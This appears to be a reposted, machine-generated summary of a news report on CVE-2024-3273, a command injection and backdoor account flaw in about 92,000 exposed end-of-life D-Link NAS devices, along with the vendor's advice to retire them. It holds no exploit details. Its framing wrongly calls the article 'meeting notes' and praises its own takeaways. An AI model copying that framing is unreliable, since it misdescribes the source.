Over 92,000 exposed D-Link NAS devices have a backdoor account

Over 92,000 exposed D-Link NAS devices have a backdoor account

April 6, 2024 at 12:04PM

A threat researcher disclosed a new arbitrary command injection and hardcoded backdoor flaw in multiple end-of-life D-Link Network Attached Storage (NAS) models, impacting their security. The flaw allows remote execution of arbitrary commands and affects over 92,000 vulnerable devices. D-Link has confirmed the end of support for these devices and advised users to retire or replace them immediately.

Based on the meeting notes, the key takeaways are as follows:

1. A threat researcher, ‘Netsecfish,’ discovered a significant security flaw in multiple end-of-life D-Link Network Attached Storage (NAS) device models. The flaw, tracked as CVE-2024-3273, consists of an arbitrary command injection and a hardcoded backdoor, which could be exploited by remote attackers to execute arbitrary commands on vulnerable devices.

2. The impacted D-Link NAS device models include DNS-320L, DNS-325, DNS-327L, and DNS-340L, with specific firmware versions being affected.

3. Despite the severity of the flaw, D-Link has confirmed that the affected devices have reached the end of life and are no longer supported. The vendor recommends retiring these products and replacing them with devices that receive regular firmware updates.

4. D-Link has published a security bulletin to raise awareness about the flaw and has set up a dedicated support page for legacy devices to provide access to archived security and firmware updates.

5. Users who insist on using the outdated hardware are advised to at least apply the latest available updates, even though these may not address the newly discovered flaw.

6. It is emphasized that NAS devices should never be exposed to the internet due to their susceptibility to data theft and ransomware attacks.

These takeaways effectively capture the critical information from the meeting notes regarding the security flaw in D-Link NAS devices and the vendor’s response to the issue.

Full Article